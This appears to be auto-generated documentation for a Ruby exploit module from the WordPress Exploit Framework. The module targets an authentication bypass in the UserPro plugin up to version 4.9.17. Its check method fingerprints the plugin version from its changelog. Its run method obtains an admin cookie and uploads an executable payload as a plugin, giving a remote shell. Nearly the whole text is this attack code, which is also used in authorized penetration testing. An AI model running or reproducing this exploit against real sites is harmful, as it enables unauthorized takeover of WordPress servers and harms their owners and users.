class Wpxf::Exploit::UserProShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/exploit/shell/userpro_shell_upload.rb, line 8
def initialize
  super

  update_info(
    name: 'UserPro <= 4.9.17 Shell Upload',
    desc: %(
      Prior to version 4.9.17.1, the UserPro plugin is vulnerable to
      an authentication bypass if a user named "admin" exists. Using
      this vulnerability, this module gains admin rights and uploads
      a payload to the target in the form of a plugin.
    ),
    author: [
      'Colette Chamberland', # Disclosure
      'Iain Hadgraft',       # Disclosure
      'rastating'            # WPXF Module
    ],
    date: 'Nov 11 2017'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/userpro_shell_upload.rb, line 28
def check
  changelog = normalize_uri(wordpress_url_plugins, 'userpro', 'changelog.txt')
  regex = /Version\s+([\d\.]+)\s+/
  check_version_from_custom_file(changelog, regex, '4.9.17.1')
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/userpro_shell_upload.rb, line 51
def run
  return false unless super

  emit_info 'Acquiring admin cookie...'
  cookie = fetch_admin_cookie
  if cookie.nil?
    emit_error 'Failed to acquire an admin cookie. A user named "admin" may not exist.'
    return false
  end

  emit_info 'Uploading payload...'
  res = upload_payload_as_plugin_and_execute(
    Text.rand_alpha(10),
    Text.rand_alpha(10),
    cookie
  )

  !res.nil?
end